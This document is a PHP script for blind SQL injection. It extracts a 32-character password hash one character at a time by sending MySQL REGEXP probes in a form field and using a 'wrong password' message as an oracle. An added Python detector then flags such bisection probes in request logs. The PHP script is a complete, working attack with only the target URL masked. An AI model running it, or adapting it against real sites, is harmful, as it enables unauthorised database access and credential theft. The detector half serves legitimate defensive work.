PHP script for MySQL blind injection using regular expressions and binary search
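```php
<?php
// libHTTP is an HTTP helper class that is not defined on this page;
// it has to be provided separately.
$sUrl = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx';
$sPost = 'inject=Inject&injection=';
$sCharset = 'ABCDEF0123456789';

/* for every character */
for ($i=0, $hash=''; $i<32; ++$i) {
    $ch = $sCharset;

    // Binary search: halve the candidate set until one character is left.
    do {
        $ch1 = substr($ch, 0, intval(strlen($ch)/2));
        $ch2 = substr($ch, intval(strlen($ch)/2));

        // Ask whether the next character is in the first half ($ch1).
        $p = $sPost.'absolutelyimpossible\' OR 1=(SELECT 1 FROM blight WHERE password REGEXP \'^'.$hash.'['.$ch1.']\' AND sessid=xxx) AND \'1\'=\'1';
        $res = libHTTP::POST($sUrl, $p);

        // No "wrong password" message means the REGEXP matched.
        if (strpos($res['content'], 'Your password is wrong') === false)
            $ch = $ch1;
        else
            $ch = $ch2;

    } while (strlen($ch) > 1);

    $hash .= $ch;
    echo "\rhash: ".$hash;
}
```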
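On the defending side, the requests this script sends have a recognizable shape: repeated `REGEXP '^prefix[set]'` probes from one client in which the candidate set shrinks and the anchored prefix then grows by one character. The detector below is an added example, not part of the original post; the `(client, decoded body)` log format, the client addresses, and the `min_probes` threshold are assumptions.

```python
import re
from collections import defaultdict

# Shape of the probe the script above sends: REGEXP '^<known prefix>[<candidates>]'
PROBE = re.compile(r"REGEXP\s+'\^([0-9A-Za-z]*)\[([^\]]+)\]'", re.IGNORECASE)

def find_regexp_bisection(requests, min_probes=6):
    """requests: iterable of (client, url-decoded POST body) in arrival order.
    Returns {client: {"probes": n, "leaked_chars": k}} for clients whose
    probes narrow a character class and then extend the anchored prefix."""
    per_client = defaultdict(list)
    for client, body in requests:
        m = PROBE.search(body)
        if m:
            per_client[client].append((m.group(1), m.group(2)))

    flagged = {}
    for client, probes in per_client.items():
        narrowed = extended = 0
        for (p0, c0), (p1, c1) in zip(probes, probes[1:]):
            if p1 == p0 and len(c1) < len(c0):
                narrowed += 1          # same prefix, smaller candidate set
            elif len(p1) == len(p0) + 1 and p1.startswith(p0):
                extended += 1          # one more character confirmed
        if len(probes) >= min_probes and narrowed and extended:
            # Longest anchored prefix = characters already recovered.
            leaked = max(len(p) for p, _ in probes)
            flagged[client] = {"probes": len(probes), "leaked_chars": leaked}
    return flagged

# Constructed sample log (client addresses are from documentation ranges).
_T = ("inject=Inject&injection=x' OR 1=(SELECT 1 FROM blight WHERE password "
      "REGEXP '^{}[{}]' AND sessid=xxx) AND '1'='1")
SAMPLE = [
    ("203.0.113.7", _T.format("", "ABCDEF01")),
    ("198.51.100.4", "inject=Inject&injection=hunter2"),
    ("203.0.113.7", _T.format("", "2345")),
    ("203.0.113.7", _T.format("", "23")),
    ("198.51.100.9", "inject=Inject&injection=REGEXP '^a[bc]' help"),
    ("203.0.113.7", _T.format("", "2")),
    ("203.0.113.7", _T.format("3", "ABCDEF01")),
    ("203.0.113.7", _T.format("3", "ABCD")),
]

if __name__ == "__main__":
    print(find_regexp_bisection(SAMPLE))
```

The `leaked_chars` value tells a responder how much of the 32-character hash had already been recovered when the probing was noticed.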